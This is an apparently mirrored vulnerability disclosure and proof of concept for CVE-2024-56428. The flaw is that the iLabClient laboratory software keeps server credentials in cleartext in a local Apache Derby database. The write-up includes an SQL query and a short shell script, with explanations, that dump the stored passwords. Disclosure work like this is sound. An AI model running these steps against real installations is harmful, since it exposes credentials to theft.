## https://sploitus.com/exploit?id=296FE72F-F83B-539A-A593-0F7E8A4057C3
CVE-2024-56428
==============
***Cleartext credentials in local database of the iLabClient***
<br>
### Read out the configuration incl. password
The iLabClient is used to download the results from the laboratory server. The configuration data
are stored locally in the Apache Derby instance `iLabClient`. The password is stored in plain text. In order to
be able to read this, a connection to the local database must first be established, for example as described in
[CVE-2024-56429](https://github.com/lisa-2905/CVE-2024-56429).<br>
Read out the passwords:
```
select EINSTELLUNGEN from configs;
```
<br>
### Automated script
The `get_configs.sh` script can be executed to read out the configuration data. It is important that
no other program (e.g. the iLabClient itself) accesses the database during execution.
Explanations to the script:<br>
```
#! /bin/bash
"C:\ilabClient\java8u422\bin\java.exe" -jar ".\derby-lib\derbyrun.jar" ij script_sql.sql
read
```
`"C:\ilabClient\java8u422\bin\java.exe"`: Use of the Java version supplied with the installation of the client. Change
this if the client was installed in a different directory.<br>
`-jar`: Instruction that a JAR file is to be executed<br>
`".\derby-lib\derbyrun.jar ij"` Execution of the `ij` tool from Apache Derby<br>
`script_sql.sql`: Script that reads out the corresponding configurations. Change the path to the database in this file
when the client was installed in a different directory.<br>
------
Discoverer: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)